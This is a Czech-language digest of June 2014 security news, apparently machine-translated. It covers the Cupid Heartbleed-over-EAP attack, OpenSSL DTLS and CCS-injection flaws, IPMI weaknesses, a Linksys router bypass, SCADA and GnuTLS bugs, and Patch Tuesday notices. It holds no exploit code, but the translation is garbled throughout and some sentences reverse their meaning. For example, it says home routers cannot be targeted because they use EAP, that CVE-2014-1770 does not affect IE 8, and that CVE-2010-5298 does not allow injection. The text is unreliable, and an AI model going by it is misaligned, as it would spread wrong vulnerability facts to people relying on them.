Uplynulo téměř dva měsíce od veřejného odhalení z chyby Heartbleed ovlivňující široce používaný open source kryptografické knihovny OpenSSL. Reakce bezpečnostní komunity, dodavateli softwaru a hardwaru, majitelům webových stránek a poskytovatelů on-line služeb byla almos okamžité a poprvé v historii i širší veřejnost věděla, že něco není v pořádku. Ale od té doby, šílenství zemřel dolů bit, a mnozí nyní věří, že nebezpečí prošel. Není tomu tak, říká Luis Grangeia, partner a bezpečnostní služby manažer SysValue. On dokázal, že stejný exploit, který byl použit k využití Heartbleed může být také použit k cíli jakékoliv zařízení s operačním systémem je unpatched verzi OpenSSL, a on říká, že útok je úspěšný proti bezdrátových a některých kabelových sítí. On říkal využít " Amora ". "Cupid je název jsem dal do dvou zdrojových opravy, které mohou být použity na programy" hostapd "a" wpa_supplicant "na Linuxu. Tyto skvrny změnit chování programů využít heartbleed chybu na připojení TLS aby se to stalo u některých typů chráněných heslem bezdrátových sítí, "řekl vysvětlil v blogu v pátek. "To je v podstatě stejný útok, jako Heartbleed, na základě škodlivého srdeční paketu. Stejně jako původní útoku, který se děje na pravidelných TLS spojení přes TCP , oba klienti a servery mohou být využity, a paměť je možno odečítat procesy na obou koncích spojení. Rozdíl v tomto případě je to, že spojení TLS se provádí na EAP, což je rámec ověření / mechanismus používaný v bezdrátových sítích. To je také používáno v jiných situacích, včetně kabelových sítích, které používají 802.1x Network Authentication a peer-to-peer připojení ". "EAP je jen rámec použit na několika ověřovacích mechanismů Ty, které jsou zajímavé v této souvislosti jsou:. EAP-PEAP, EAP -TLS a EAP-TTLS, což jsou ty, které používají TLS, "dodal. Využít lze úspěšně obrátil proti Android zařízení se systémem 4.1.0 nebo 4.1.1, linuxové systémy / zařízení, které ještě mají starší OpenSSL knihovny, a většina firemní podařilo bezdrátových řešení, které používají ověřování EAP na základě autentizační mechanismy. Většina domácích routerů nemůže být cílená, protože oni používají tyto konkrétní autentizační mechanismy. On také poukázal na to, že předchozí přesvědčení, že Heartbleed mohou být využívány pouze přes TCP spojení a po TLS handshake jsou falešné. On publikoval využívat kódu a požádal výzkumníky, aby to vyzkoušet proti více sítí a zařízení.


Proč koncový bod zálohování je kritická
9.6.2014 Zranitelnosti
Podniky jsou na rostoucí riziko ztráty dat v důsledku rostoucího množství firemních dat uložených na koncových bodů-notebooky, smartphony, tablety a dalšími zařízeními, které jsou umístěny na okraji sítě.

Jedná se o výsledky nové studie, provedené společností Forrester Consulting jménem Code42, je na základě průzkumů více než 1200 IT s rozhodovací pravomocí a zaměstnanců v US-založené firmě společnosti. Výsledky ukazují zvyšující se počet zaměstnanců používat kombinaci notebooky, tablety a chytré telefony pro pracovní účely. Tento rostoucí "kdekoliv, kdykoliv, kdekoliv, přístroj" pracoviště znamená, že firemní data uložená lokálně na zařízení, je zvýšené riziko ztráty nebo krádeže protože bydlí mimo bezpečnost datového centra a podnikové brány firewall. Studie také poukazuje k důkaznímu na IT pro ochranu dat na zařízení, na kterém pracují zaměstnanci. "Více než polovina dotázaných zaměstnanců pro společnosti Forrester zařízení a bezpečnostní Workforce Survey Q2 2013 předpokládáme jejich společnosti zálohovat své nejdůležitější soubory, zda je to skutečně pravda. Nicméně, mnoho zaměstnanců také použít své vlastní metody ochrany kritických dat, zvláště pokud neexistuje firemní oběť. Názorný příklad: 41 procent zaměstnanců zálohovat důležité soubory pomocí flash disku nebo CD / DVD, a 28 procent zálohovat na externí pevný disk nebo serveru, které vlastní. " Naštěstí, organizace uznávají důležitost zálohování koncových bodů, a pro dobré důvod. Podle studie společnosti Forrester, 85 procent organizací, které přijaly nebo mají v úmyslu přijmout, koncových řešení zálohování citovat zlepšení kontinuity podnikání / obnovení po zhroucení jako nejlepší řidiče. Jen méně než polovina organizací atribut přijímání zaměstnanců ukládání důležitých dat na koncových bodů, následuje 43 procent si přeje udržet si kontrolu dat, a 34 procent ukazující na e-discovery a / nebo právnická hold prostřednictvím centralizace jako řidič. Podle společnosti Forrester Consulting, "Téměř dvě třetiny respondentů uvedlo, že jejich organizace zažil ztrátu dat v koncových bodech z důvodů, jako je například ztracených nebo odcizených zařízení nebo náhodnému smazání souborů." Studie také uvádí, "se spoléhat na tradiční firewally a místních sdílených souborů je bez dost déle, pokud jde o zabezpečení a zálohování Tato kritická, citlivá data. " "Tato nová studie ukazuje, zaměstnanci vytvářet a přístup k datům společnosti na tablety, notebooky a telefony z kdekoli a kdykoli, na riziko ztráty dat," řekl Brian Bell, prezident a provozní ředitel v Code42. "Většina z nich není úmyslně vystavit firemní údaje k riziku; jsou to jen to, co je zapotřebí, aby si jejich práci. Takže je to na podnikové IT, aby se ujistil údaje o zařízení jsou chráněna. Jakmile to dat je zálohovat, vaše společnost může snadněji přijmout iniciativy na celém e-discovery, právního prostoru, obnovu po haváriích a migraci dat. Endpoint zálohování je opravdu základem pro komplexní strategie správy dat. "


Microsoft června Patch Tuesday Advance Notification
6.6.2014 Zranitelnosti

Microsoft očekává uvolnění 2 kritické a 5 důležitých bulletinů v úterý [1].

Nejsou žádné skvrny naplánované pro systém Windows XP, i když CVE-2014-1770 nemá vliv na aplikaci Internet Explorer 8, což je poslední verze IE spustit v systému Windows XP.

Předběžná Patch Tabulka: (čísla nástěnky a něco jiného se může změnit v konečné verzi)

# Ovlivněno Kontraindikace - KB Známé Využije Hodnocení Microsoft (**) ISC hodnocení (*)
klienti servery
MS14-030 Kumulativní Internet Explorer aktualizace

Internet Explorer CVE-2014-1770
TBD Vuln. známé, ale v souladu s MSFT dosud využíván. Závažnost: Kritická
zneužitelnosti:? Kritický Kritický
MS14-031 Microsoft Office a Lynx umožňující vzdálené spuštění kódu

Windows, Office, Lync (klient) TBD . Závažnost: Kritická
zneužitelnosti:? Kritický Důležitý
MS14-032 Microsoft Office umožňující vzdálené spuštění kódu

Microsoft Office TBD . Závažnost: Důležité
zneužitelnosti:? Kritický Důležitý
MS14-033 Přístup k informacím Chyba zabezpečení v systému Windows

Microsoft Windows TBD . Závažnost: Důležité
zneužitelnosti:? Důležitý Důležitý
MS14-034 Přístup k informacím Chyba zabezpečení v serveru Lync

Lync Server TBD . Závažnost: Důležité
zneužitelnosti:? N / A Důležitý
MS14-035 Denial of Service chyby zabezpečení v systému Windows

Microsoft Windows TBD . Závažnost: Důležité
zneužitelnosti:? Důležitý Důležitý
MS14-036 Manipulace zabezpečení v systému Windows

Microsoft Windows TBD . Závažnost: Důležité
zneužitelnosti:? Důležitý Důležitý

[1] https://technet.microsoft.com/library/security/ms14-jun


Další podrobnosti týkající se CVE-2014-0195 (DTLS Spuštění libovolného kódu)
6.6.2014 Zranitelnosti

Prezentace snímků (PDF)

Zero Day Initiative společnosti HP vydala několik dalších podrobností o tento problém vysvětlit podstatu problému. Ve skutečnosti je to pozoruhodně podobná některé z fragmentace chyby IP jsme vidět v minulosti.

DTLS se snaží, aby se zabránilo fragmentaci IP. Ale mnoho zpráv SSL související obsahovat data (například certifikáty), které přesahují běžné síťové jednotky MTU. V důsledku toho, DTLS fragmenty zprávy. Každý fragment zpráva obsahuje 3 Délka související oblasti:

- Velikost zprávy (délka) - to je celková velikost po smontování. Měl by být stejný pro všechny fragmenty
- Fragment offset - kde to fragment fit v původní zprávě.
- Fragment Length - kolik dat to fragment obsahuje.

Není-li roztříštění, je délka fragmentu je rovna velikosti zprávy. Nicméně, v případě, že délka fragmentu je menší než je velikost zprávy, máme fragmentaci. Každý fragment by mělo být uvedeno stejné velikosti zprávy.

Toto je odlišné od šetření. V období šetření, fragment neví, jak velké původní balíček byl, a používáme "více fragmentů" příznak zjistit, kdy jsou přijaty všechny fragmenty.

Jakmile OpenSSL obdrží fragment, přiděluje "délka" bytů opět složit celou zprávu. Nicméně, trik je, že další fragment může ve skutečnosti ukazují, větší velikost zprávy, a v důsledku toho poskytují další data pak OpenSSL vyhrazena, což vede k typické přetečení vyrovnávací paměti.

Můžete vidět kompletní zdrojový kód na HP blogu, včetně zobrazení Wireshark z PoC paketu. To v podstatě poskytuje PoC této chyby. Zajímavé je Wireshark se uznávají jako chybu.

[1] http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002#.U5C78BYXk2-

Â

(Tohle je něco jiného, ​​ale trochu mi připomíná mbuf problému OpenBSD v IPv6, CVE-2007-1365)


New OpenSSL MITM Chyba se týká všech klientů, některé verze serveru
6.6.2014 Zranitelnosti
K dispozici je nová, vzdáleně zneužít zranitelnost v OpenSSL , která by mohla umožnit útočníkovi, aby zachytit a dešifrovat komunikaci mezi zranitelnými klienty a servery. Vada ovlivňuje všechny verze klienta OpenSSL a verze 1.0.1 a 1.0.2-beta1 serverového softwaru.

Nová chybu zabezpečení lze zneužít pouze k dešifrování komunikace mezi zranitelné klientem a serverem zranitelné, a útočník by musel mít postavení man-in-the-middle na síti, aby tak učinily. To není zanedbatelné soubor podmínek, které musí být přítomny po úspěšném útoku, ale v současném prostředí, kde otevřené bezdrátové sítě jsou všude a mnozí uživatelé připojit k nim bez rozmýšlení, získává pozici MITM není nepřekonatelnou překážkou.

Vědci, kteří se dívali na zranitelné kus kódu, říkají, že to vypadá, že existovaly, téměř beze změny, ve zdroji OpenSSL od roku 1998.

"Změny kódu jsou po odmítnutí ChangeCipherSpec zpráv, které jsou zprávy odeslané v průběhu TLS handshake, které označují změny od nešifrované na šifrovanou komunikaci. Tyto zprávy nejsou součástí handshake protokol sám a nejsou spojeny do státního stroje handshake v OpenSSL. Spíše je tu kontrola v kódu, které jsou přijaty pouze tehdy, když nový kód je připraven k použití, "Adam Langley, výzkumník z bezpečnostního týmu společnosti Google, napsal v analýze zranitelnosti.

"Ale, že kontrola (pro S-> s3-> tmp.new_cipher v s3_pkt.c ) se zdá rozumné, ale new_cipher je vlastně soubor, jakmile šifra pro připojení bylo rozhodnuto (tj. jednou zprávu ServerHello byla odeslána / přijaté), není-li šifra je vlastně připraven! Vypadá to, že se jedná o problém, který je, jak se stanoví v této verzi. "

Masashi Kikuchi, japonský vědec, který objevil chybu, potvrdil, že chyba byla přítomna v OpenSSL od první verze a že pravděpodobně by byly zjištěny dříve.

"Největším důvodem, proč se chyba nebyla nalezena více než 16 let je to, že hodnocení kódů byly nedostatečné, a to zejména z odborníků, kteří měli zkušenosti s prováděním TLS / SSL. Pokud recenzenti měli dostatek zkušeností, měly by být ověřeny OpenSSL kód stejným způsobem dělají svůj vlastní kód. Mohli zjištěn problém, "řekl Kikuchi ve svém vysvětlení zranitelnosti a jak se objevil.

"Rozvláknění může mít pracoval. Nicméně, jak historie (viz níže) ukazuje, znalost implementace TLS / SSL zdá velmi důležité. "

CVE-2014-0224 chyba vynořily dva měsíce po OpenSSL Heartbleed zranitelnost přišel ke světlu.
Nová CVE-2014-0224 chyba na povrch dva měsíce po OpenSSL Heartbleed zranitelnost přišel ke světlu. Že chyba byla považována za mnohem vážnější a ovlivnila velké množství různých systémů a klientů a administrátory a bezpečnostní techniky míchaná to opravit, než útočníci začali využívat ní. Heartbleed způsobil hodně diskuse a debaty v bezpečnostní komunitě a dokonce krvácela i do hlavního proudu, i když ne nutně s nejpřesnějších informací.

Tato chyba OpenSSL je vážná, stejně, ale pravděpodobně nebude mít stejný druh utrpení. Přesto, Langley uvedl ve své analýze, že chyba zabezpečení by mohla mít různé efekty.

"Důsledky tohoto jsou docela složité. Pro klienta je tu další kontrola v kódu, který vyžaduje, aby zpráva CCS se před cíli a po hlavní tajemství byl vytvořen. Útočník může ještě aplikovat brzy CCS moc a klíče budou vypočítány s prázdnou hlavní tajemství. Tyto klíče se západkou - další CCS nezpůsobí, aby mohly být přepočítány. Nicméně, při posílání druhé CCS, že kód klienta vyžaduje, cíli hash se přepočítá se správným hlavní tajemství. To znamená, že útočník nemůže vyrobit přijatelné Hotový hash. To zastaví zřejmé, obecný zosobnění útok proti klientovi, "napsal Langley.

"Na serveru není žádný takový kontrola a zdá se, že je možné zaslat včasné zprávu CCS a pak vyrobit hotový hash, protože je založen na lačný hlavní tajemství. Nicméně, to není samozřejmě získat útočníka nic. "

Tato chyba ovlivňuje některé mobilní implementace OpenSSL, stejně. Google již vydala aktualizovanou verzi Chrome pro Android opravit tento problém v mobilní verzi prohlížeče.

Kromě MITM zranitelnosti, OpenSSL pevné několik dalších chyb v jeho nejnovější verzi. Čtyři z těchto chyb zabezpečení mohou být použity způsobit denial-of-service, zatímco zbývající jeden může umožnit vzdálené spuštění kódu.


Microsoft Předpokládá se, že Patch IE 8 Zero Day na Patch Tuesday
6.6.2014 Zranitelnosti
Vyzváni k vyzrazení zero-day zranitelnosti v aplikaci Internet Explorer 8 více než šest měsíců poté, co bylo hlášeno, bude Microsoft příští úterý konečně vydat opravu.

Iniciativa Den HP Zero (ZDI) vydala dne 21. května některé podrobnosti o předem neohlášené použití-po-free chyba v IE 8 žádné veřejné využije byly hlášeny., A zatímco Microsoft potvrdil přijetí zprávy zranitelnosti z ZDI, že nebyl vyroben patch před zveřejněním ZDI je na jejích pokynů.

Tato chyba ovlivňuje pouze IE 8, který postrádá některé využívají snižující závažnost rizika v novějších verzích prohlížeče. Microsoft květnu řekl, že si je vědoma tohoto problému.

"Některé opravy jsou složitější než jiné, a my musíme testovat každý proti obrovské množství programů, aplikací a různých konfiguracích," řekl mluvčí společnosti Microsoft. "Budeme i nadále podporovat zákazníky, aby přešli na moderní operační systém, jako je Windows 7 nebo 8.1, a spusťte nejnovější verzi aplikace Internet Explorer, které zahrnují další ochranu."

IE patch je jedním ze dvou bulletinů Microsoft se jmenovitým kritické aktualizace zabezpečení Patch úterý příští týden.
IE patch je jedním ze dvou bulletinů Microsoft se jmenovitým rozhodující pro příští týden aktualizací zabezpečení Patch Tuesday. K dispozici bude sedm bulletiny ve všech, pět hodnocené důležitých společností. IE oprava bude pravděpodobně kumulativní kumulativní, jak to ovlivňuje prohlížeč celou cestu zpět do IE 6 na Windows Server 2003.

Druhým zásadním bulletin je také vzdálené spuštění kódu, tentokrát v Microsoft Office a Microsoft Lync, zpráv společnosti a videokonferenční aplikace. Tato chyba je kritický stupeň závažnosti pro Lync 2013 a 2010, stejně jako Live Meeting 2007 konzoly; je hodnocena jako důležitá pro Microsoft Office 2010 a Office 2007.

"Vzhledem k tomu, že druhý bulletin bude mít vliv na Lync Server a starší Live Meeting Console to může být opravdu vzdáleně zneužít zranitelnosti," řekl Ross Barrett, senior manažer bezpečnostního inženýrství na Rapid7.

Windows Server 2003, je třeba poznamenat, má téměř vstoupila do své poslední rok podpory; je to naplánováno jít na konci životnosti v červenci 2015.

"Jsme přijít jen na jeden rok venku a protože jakékoli změny vašeho serveru bude pravděpodobně značné množství práce, to není příliš brzy začít pracovat na tomto plánu," řekl Russ Ernst, ředitel produktového managementu, Lumension.

Zbývající bulletiny, všechny hodnocené důležité, zahrnují vzdálené spuštění kódu chybu v úřadu, samostatné zveřejňování informací zranitelná místa v systému Windows a serveru Lync, zranitelnosti denial-of-service v systému Windows, a manipulace zabezpečení v systému Windows.

"Manipulaci štítek na sedmém bulletinu může naznačovat, že umožňuje zprávy, které mají být změněny na cestě," řekl Barrett. "Pravděpodobně omezený scénář pro využití."


Chyby zabezpečení v protokolu IPMI dlouhou životnost
6.6.2014 Zranitelnosti
Pokud podniky skutečně stěhovací služby mimo prostor a do cloudu, jsou tam čtyři dopisy IT organizace těchto společností měli být vědomi: IPMI.

Zkratka pro Intelligent Platform Management Interface, tyto malé počítače žít jako vložený Linux systému připojeného k desek velkých serverů od výrobců, jako jsou IBM, Dell a HP. IPMI je používán Management Controller (BMC) Baseboard pro správu Out-of-band komunikaci, v podstatě dává admini dálkové kontrolu nad servery a zařízení, včetně paměti, schopností a ukládání sítí. To je zvláště užitečné pro hosting poskytovatelů a cloud poskytovatelů služeb, kteří se musí řídit zařízení a data v různých lokalitách.

Známí vědci Dan Farmer, tvůrce SATAN Vulnerability Scanner a HD Moore, tvůrce Metasploit, kteří spolupracují na výzkumu zranitelnosti přítomných v IPMI a BMCs a obraz čím dál ošklivější. Loni v červenci, farmář a Moore publikoval nějaký výzkum na toto téma založené na práci Farmer dělal pod DARPA Cyber ​​Fast Track Grant, který odhalil řadu slabých míst, a Internet v celém skenování pro protokol IPMI taktovkou Moore.

Včera, Farmer vydala dokument s názvem "Prodáno Down River", ve kterém on kárá velké dodavatele hardwaru pro ignorování chyb zabezpečení a špatné konfigurace, které jsou triviální najít a využít.

"Mnohé z těchto problémů by bylo snadné opravit, pokud je protokol IPMI prodělal vážnou bezpečnostní prověrku, nebo v případě, strávil vývojáři moderní BMCs trochu více úsilí v kalení své produkty a poskytovat svým zákazníkům nástroje k zajištění svých serverů," napsal Farmer. "V tomto bodě, to je příliš pozdě uskutečnit významnou změnu."

Farmář řekl, že počet serverů s zranitelných BMCs dali IPMI nejistoty dlouhou trvanlivost.
Farmář řekl, že počet serverů s zranitelných BMCs dali IPMI nejistoty dlouhou trvanlivost.

IPMI běží bez ohledu na základní operační systém a působí na UDP portu 623 pomocí síťového portu serveru, nebo jeho vlastní port Ethernet. To běží nepřetržitě, farmář řekl, není-li zástrčka je doslova vytáhl. Mooreův skenování vytáhl 230000 reakce na portu 623, což je sice malý plátek z celkového počtu implementací. Přesto Farmer k závěru, že 90 procent BMCs běží IPMI mohla být ohrožena z důvodu neplnění nebo slabých hesel nebo nedostatky v protokolu, a to nejen zaplétat hostitelského serveru, ale ostatní ve stejné skupině správy, protože, jak se objevil, někteří prodejci mají společné hesla.

"Je-li běh-of-the-mlýn serveru ohrožena odhaluje svou vlastní BMC zaútočit ze svého hostitele, který by mohl riskovat posvátnost celé sítě řízení," napsal Farmer. "A v případě, že BMCs, že jsem nebyl schopen měřit něco jako ty jsem byl, to je skutečný problém."

K dispozici jsou dvě populární verze IPMI 1.5 a 2.0, a tam je téměř 50-50 rozkol v nasazení. BMCs běží verze 1.5 je však vážně o zranitelnosti trápily v tom, že téměř všechny porty pro správu serveru mají prázdná množina ověřování, takže log-in bez ověření. Téměř všechny BMCs, farmář řekl, také NULL povolena, což v kombinaci s problematikou správy serveru, dává hackerům otevřené dveře ke všem starším systému IPMI.

"Práva spojená s NULL účtu se liší u jednotlivých výrobců, ale zdá se, že obvykle udělit přístup správce," napsal Farmer. "Bez ohledu na to však může způsobit vzdálené spuštění příkazů na serveru je špatné."

Farmář řekl, 90,1 procent z IPMI 1.5 systémů měl NULL ověřování povoleno. Skládání problému je, že 1,5 i nemá kryptografické ochrany mezi uživatelem a BMC, opouštět to bezbranný vůči útokům proti síťového provozu, jako jsou hesla šňupání a man-in-the-middle útoky.

Verze 2.0, mezitím, zahrnuje některé kryptografických ochran a někteří prodejci uznané NULL autentifikaci jako zranitelnost a pevně ji asi v polovině implementací. Crypto použít, ale zavádí nové bezpečnostní problémy, řekl farmář. Protokol Cipher Zero umožňuje outsider přihlásit bez ověřování, pouze platné uživatelské jméno; každá heslo bude ignorován, řekl farmář. Většina prodejců serveru ve výchozím nastavení jej na svém BMC; HP nedávno dal uživatelům možnost vypnout je poprvé, řekl farmář.

Nejhorší chyba zabezpečení je autentizace RAKP heslo dálkového načtení hash chyb. Proces ověřování zde stanovuje, že server odeslat osolené SHA1 nebo MD5 hash hesla klienta před ověřování ji. Útočník může ukrást tento hash, a brute-force útoku offline.

"Bohužel to znamená, že i když jste na míč a up-to-data s vaším záplatování, které všechny známé bezpečnostní problémy pevné, a vše funguje, jak bylo plánováno, pokud útočník může hádat platný název účtu mohou dostat jeho hash hesla a bezva heslo, aniž byste to věděli, "napsal Farmer.

Farmář řekl, že používá metasploit skenovat IPMI 2.0 BMCs získat heslo hashe z 83 procent těchto systémů, a pomocí populární John Ripper heslo cracker, on byl schopný dostat 30 procent z těchto hesel. A většina z těchto hesel se snadno guessable hesla jako "admin".

Další testování, farmář řekl, bylo zjištěno, že 11.500 BMCs sdílí společné heslo, které by byly bez dokladů výchozí heslo; a dalších 1300 BMCs, nejvíce v Evropě v první řadě na šesti sítích, měla sdílené heslo, pravděpodobně ukazuje na poskytovatele služeb s použitím společné heslo pro správu rozptýlených systémů, řekl farmář.

Papír Farmer také uvádí řadu strategických a technických obrany podniky mohou využívat, včetně smluvních doložkách pro poskytovatele služeb zakazující používání společných nebo podobných hesel, a zakázání výchozích dodavatelů uživatelských jmen používaných jako názvy účtů, které mohou být zneužity, kde Cipher Zero je přítomen.


Linksys E4200 zabezpečení Umožňuje Obejití autentizace
6.6.2014 Zranitelnosti
Lynksys E4200 V2 dvoupásmový router obsahuje chybu zabezpečení, která by útočník mohl zneužít, obejít mechanismus autentizace Web panel a získat oprávnění správce na dotčených zařízeních.
Linksys poskytl aktualizaci firmwaru, která řeší tuto chybu zabezpečení. Nicméně, stejně jako téměř vždy v případě routeru zranitelností, uživatelé dotčených zařízení musí surfovat na Linksys E4200 webové stránky a stáhnout a nainstalovat firmware ručně. Výzkumník, který odhalil chybu tvrdí, že problém je dále zhoršila, protože Linksys neinformoval zákazníky o chybě nebo opravy pro něj.
Nezávislý bezpečnostní výzkumník Jordan Bradley tvrdí, že chyba je způsobena schopností routeru naslouchat na portu 8083.
Nezávislý bezpečnostní výzkumník Jordan Bradley tvrdí, chyba je způsobena schopností routeru naslouchat na portu 8083 se stejným rozhraním jako na portu 80. To je významné, protože přístup k zařízení přes port 8083 zcela obchází proces ověřování HTTPS a uděluje oprávnění správce, který zařízení.
Za vnitřní dopadu dává útočníkovi plná administrátorská oprávnění na postižených E4200 routery, chyba má potenciální vnější důsledky stejně. Přístroj může být vystaven působení širšího Internetu, pokud ovladač síťové měl nějaké DMZ nebo pravidla pro předávání povolena.
Bradley konstatuje, že problém je umocněn tím, rozbité funkcí firmware kontroly. Zařízení se zkouší tuto chybu na domnělý mít to, co bylo v té době nainstalována nejnovější verze firmwaru. Ve skutečnosti však bylo používáte starší verzi. Nejnovější verze firmwaru přístroje - ten, který řeší obtokový chybu - je také řekl, aby problém vyřešit rozpoznání verze firmwaru. Výzkumník říká, že neexistuje žádný náznak toho druhého opravy v changelogu firmware.
"Jako součást odpovědného procesu zveřejňování informací, kontaktoval jsem Linksys 12.února th , "Bradley píše. "Trvalo to několik týdnů před tím, než mě vzali vážně, ale pak odpověděl a požádal mě, abych to více testování. Udělal jsem, a dali jim výsledky, z nichž se zavázaly k uvolnění CVE pro to. "
Pak čekal čtyři měsíce, ve kterém se tvrdí, že pravidelně se natáhl na Linksys, před zpřístupněním chybu veřejně včera.
V aktualizaci, když konstatuje, že stejná zranitelnost byla dříve odhalen nezávislý výzkumník Kyle Lovett.


COPA-DATA Patche DNP3 SCADA zranitelnosti
6.6.2014 Zranitelnosti
Byla zjištěna chyba zabezpečení v konkrétní značku SCADA software, který, pokud je ponechána unpatched, by mohlo vést k odmítnutí služby, a jít na kompromis komunikační spojení v softwaru, což má za následek nestabilitu systému.

Problém je nesprávné vstupní validace zranitelnost a existuje v softwaru podle COPA-DATA, rakouské průmyslové automatizace společnosti.

Objevitel SCADA chyb lovci Adam Crain z Automatak a Chris Sistrunk z Mandiant, zejména zranitelnost postihuje Distributed Network Protocol (DNP3) ovladač v Zenon, Windows-založené průmyslové automatizace softwaru používaného v systémech SCADA.

Podle společnosti, software se používá především v oblasti energetiky a infrastruktury průmyslových odvětví, včetně vody a odpadních vod léčebných zařízení v USA a Austrálii, ale také v dalších zemích po celém světě.

Industrial Control Systems Cyber ​​Emergency Response Team (ICS-CERT), která vydala varování o zranitelnosti úterý varuje, že jak IP-připojení a sériově připojena zařízení mohou stát obětí tohoto problému.

Útočník by mohl buď využít tuto chybu zabezpečení vytvořením škodlivého IP paket, nebo tím, že se fyzický přístup k němu přes nějaký horlivý sociálního inženýrství.

Bez ohledu na vektor útočník skončí použití, mohli přinutit řídicího systému jít do "nekonečné smyčky, což způsobuje proces k havárii." Odtud se někdo bude muset ručně restartovat systém.

Společnost nedávno tlačil nový build (11206) pro Zenon, který se zabývá zranitelností a jeho povzbuzující nikomu běží systémů s ní k aktualizaci nebo upgrade způsobem.

Crain a Sistrunk objevili lodní ICS zranitelností v průběhu let, včetně 25. října loňského roku . Mnoho z těchto chyb zabezpečení, se zaměří na DNP3, komunikační protokol primárně používaných elektrických a vodárenských společností a SCADA systémů.

Vzhledem k tomu, DNP3 se nevztahuje North American Electric Reliability Corporation (NERC) předpisy , slabá místa, jako jsou ty, které vykopali podle Crain a Sistrunk - i když to někdy rychle záplatované - ukazují, jak snadné to může být pro útočníka zničit zařízení, které závislý na protokolu.


Kritická OpenSSL dispozici oprava. Patch teď!
5.6.2014
Zranitelnosti
- MITM vulnerablity vliv pouze servery, které běží OpenSSL 1.0.1, ale všechny klienty. Oba mají být náchylné k zneužití tohoto problému.
- MITM zranitelnost není jen DTLS (omlouvám se, měl na tom špatného během webcastu)
- aplikace Časté DTLS: Video / Voice over IP, LDAP, SNMPv3, WebRTC
- Webové servery (https ) nelze použít DTLS.
- OpenVPN "auth-tls" funkce bude pravděpodobně zmírnit všechny tyto chyby
- I když použijete "komerční software", může nadále používat OpenSSL.

Tým OpenSSL vydala kritickou aktualizaci zabezpečení dnes. Aktualizace záplaty 6 nedostatky. 1 z chyb (CVE-2014-0195), může vést ke spuštění nežádoucího kódu. [ 1 ]

Všechny verze OpenSSL jsou zranitelné vůči CVE-2014-0195, ale tato chyba zabezpečení se týká pouze DTLS klienty nebo servery (podívejte se na SSL VPN ... ne tolik HTTPS).

Také jsem jmenovitý CVE-2014-0224 kritická, protože to umožní MITM útoky, jeden z důvodů, proč používat SSL. Aby však bylo možné využít tuto otázku, jak klient a server musí být zranitelné, a jen openssl 1.0.1 je citlivá na serverech (což je důvod, proč jsem se zasekl na "důležité" pro servery). Objevitel této chyby zabezpečení zveřejnil podrobnosti zde: http://ccsinjection.lepidum.co.jp/blog/2014-06-05/CCS-Injection-en/index.html.

CVE-2010-5298 neumožňuje třetí strany k podání data do existujících spojení SSL. To by mohl být velký problém, ale podle poradenské OpenSSL, funkce SSL_MODE_RELEASE_BUFFERS obvykle není povolen.

Ujistěte se, že budete aktualizovat na jednu z těchto verzí OpenSSL:

OpenSSL 0.9.8za (openssl došly dopisy, takže namísto volání tenhle 'z' říkají, že "ZA", aby v příštích vydáních distribuce. Nicméně, to * může * být poslední 0.9.8 verze).
OpenSSL 1.0. 0m
OpenSSL 1.0.1h

CVE Název Náraz Ohrožené verze Zákazník Server
CVE-2014-0224 SSL / TLS MITM zabezpečení MITM Server: 1.0.1 Klient: 0.9.8,1.0.0,1.0.1 (oba musí být zranitelný) Kritický Důležitý
CVE-2014-0221 DTLS rekurze chyba DoS 0.9.8,1.0.0,1.0.1 Důležitý Není chybu
CVE-2014-0195 DTLS neplatné fragment zranitelnost Kód Exec. 0.9.8,1.0.0,1.0.1 Kritický Kritický
CVE-2014-0198 SSL_MODE_RELEASE_BUFFERS NULL pointer dereference DoS 1.0.0,1.0.1
(ani ovlivněna výchozí konfiguraci) Důležitý Důležitý
CVE-2010-5298 SSL_MODE_RELEASE_BUFFERS vstřikování sezení DoS nebo dat Injection 1.0.0, 1.0.1
(s více podprocesy aplikací, není ve výchozím config) Důležitý Důležitý
CVE-2014-3470 Anonymní ECDH Denial of Service DoS 0.9.8, 1.0.0, 1.0.1 Důležitý Není chybu
Údaje o prodejci:

Redhat https://rhn.redhat.com/errata/RHSA-2014-0625.html
https://rhn.redhat.com/errata/RHSA-2014-0626.html
Ubuntu http://www.ubuntu.com/usn/usn-2232-1/
FreeBSD http://www.freebsd.org/security/advisories/FreeBSD-SA-14:14.openssl.asc
[1] https://www.openssl.org/news/secadv_20140605.txt


GnuTLS Záplaty Kritický Vzdálené spuštění kódu Bug
4.6.2014 Zranitelnosti
GnuTLS, open source kryptografická knihovna, byl headliner března kvůli kritickému ověření osvědčení o zranitelnosti , které někteří mylně dát do stejné třídy jako Apple neslavný gotofail chyby .

Knihovny, který se používá v celé řadě linuxových distribucí, včetně Red Hat, Debian a Ubuntu, je zpět v centru pozornosti dnes poté, co bylo zjištěno, že kritická zranitelnost byla v poslední době záplatované.

GnuTLS hlavní architekt a Red Hat inženýr Nikos Mavrogiannopoulos vydala opravu minulou středu poté, co výzkumníků z Codenomicon, stejné firmy, které ohlásil Heartbleed OpenSSL chybu, řekl, že bych našel vzdálené spuštění chybu v GnuTLS.

"Chyba byla nalezena v cestě GnuTLS analyzován ID relace ze serveru Hello paketech TLS / SSL handshake," řekl Tomáš Hoger v poradenství vyslán Red Hat včera. "Škodlivý server nemohl použít tuto chybu odeslat příliš dlouhou hodnotu ID relace a spustit přetečení vyrovnávací paměti ve spojovacím TLS / SSL klienta s gnutls, přimět to, aby pád nebo případně spustit libovolný kód."

Oprava Mavrogiannopoulos "opravuje chybu kódování na serveru Hello pakety
Oprava Mavrogiannopoulos "opravuje chybu kódování na serveru Hello paketů; délky ID relace byly dříve kontrolovány tak, aby nepřekračoval příchozí velikosti paketů, ale nebyly kontrolovány s cílem zajistit maximální délkou sezení ID nebyl překročen. Chyba byla opravena v GnuTLS 03.1.25, GnuTLS 02.03.15, GnuTLS 3.3.3

I když to není na stejné úrovni jako v předchozím GnuTLS zranitelnosti nebo gotofail, tohle ještě dá servery hrozí vzdálené spuštění kódu nebo odmítnutí služby.

V březnu, krátce poté, co Apple gotofail SSL chyba otřásl bezpečnostní komunity, GnuTLS hlásil a záplatované podobnou chybu, kdy hacker mohl vytvořit speciálně vytvořený certifikát, který bude přijat na serveru se službou knihovnu a přijata jako platný. Více než 350 softwarových balíčků spoléhat na GnuTLS kryptografických knihoven, včetně jádra crypto a poštovních knihoven, jako libcrypt, stejně jako řada linuxových distribucí.

